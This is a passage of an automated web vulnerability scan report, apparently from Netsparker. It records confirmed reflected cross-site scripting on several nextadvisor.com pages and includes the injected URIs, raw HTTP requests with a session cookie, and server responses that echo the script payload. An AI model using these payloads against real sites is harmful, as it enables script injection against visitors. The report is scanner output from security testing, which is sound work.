User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8510
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", credit card, credit cards, cash rebate, gas rebates, balance transfer, student credit cards, bad credit, TrueEarnings&#174; Card from Costco and American Express, Miles by Discover&#174; Card, Discover&#174; Open Road Card, American Express&#174; Premier Rewards Gold Card, Chase Sapphire<sup><small>SM</small></sup>, Blue<sup><small>SM</small></sup> from American Express, Chase Freedom&#174; $100 Bonus Cash Back Visa, Chase Freedom&#174; $100 Bonus Cash Back MasterCard, Discover&#174; More Card, Blue Cash&#174; from American Express, Blue Sky from American Express<sup><small>SM</small></sup>, Discover&#174; Motiva Card, Discover&#174; Student Card, Slate<sup><small>SM</small></sup> with Blueprint, Discover&#174; Student Open Road Card, Public Savings Bank Open Sky Secured Visa&#174;, PrePaid Visa&#174; RushCard" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/credit_cards/index.php'"--></style></script><script>netsparker(0x0001BC)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001BC)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="cash_back.php">Cash Back</a><span class="nav_border">|</span><a href="travel_rewards.php">Travel</a><span class="nav_border">|</span> <a href="rewards_card.php">Rewards</a><span class="nav_border">|</span> <a href="student_card.php">Student</a><span class="nav_border">|</span> <a href="low_APR.php">Low APR</a><span class="nav_border">|</span> <a href="poor_credit.php">Poor Credit</a><span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/credit_cards_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Credit Cards FAQ</h1> <p>Frequently Asked Questions about Credit Cards</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Credit Cards:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="credit_cards"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blo..
- /diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E

/diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001D1)</script>

Request

GET /diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/diet_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:06 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6848
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", diet reviews, online diet, glycemic index diet, low glycemic diet, low carb diet, best weight loss plan, weight loss plans, diet programs, best diet, lose weight, weight loss programs, meal delivery reviews, atkins diet" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/diet_services/'"--></style></script><script>netsparker(0x0001D1)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001D1)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare_diy.php">DIY Diets</a> <span class="nav_border">|</span> <a href="compare_meals.php">Meal Plan Diets</a> <span class="nav_border">|</span> <a href="/diet_services/taste_test.php">Taste Test</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/diets_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Diet Programs FAQ</h1> <p>Frequently Asked Questions about Online Diet Programs</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Diet Programs:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="diet_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20..
- /diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DE)%3C/script%3E

/diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DE)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001DE)</script>

Request

GET /diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/diet_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6864
Content-Type: text/html


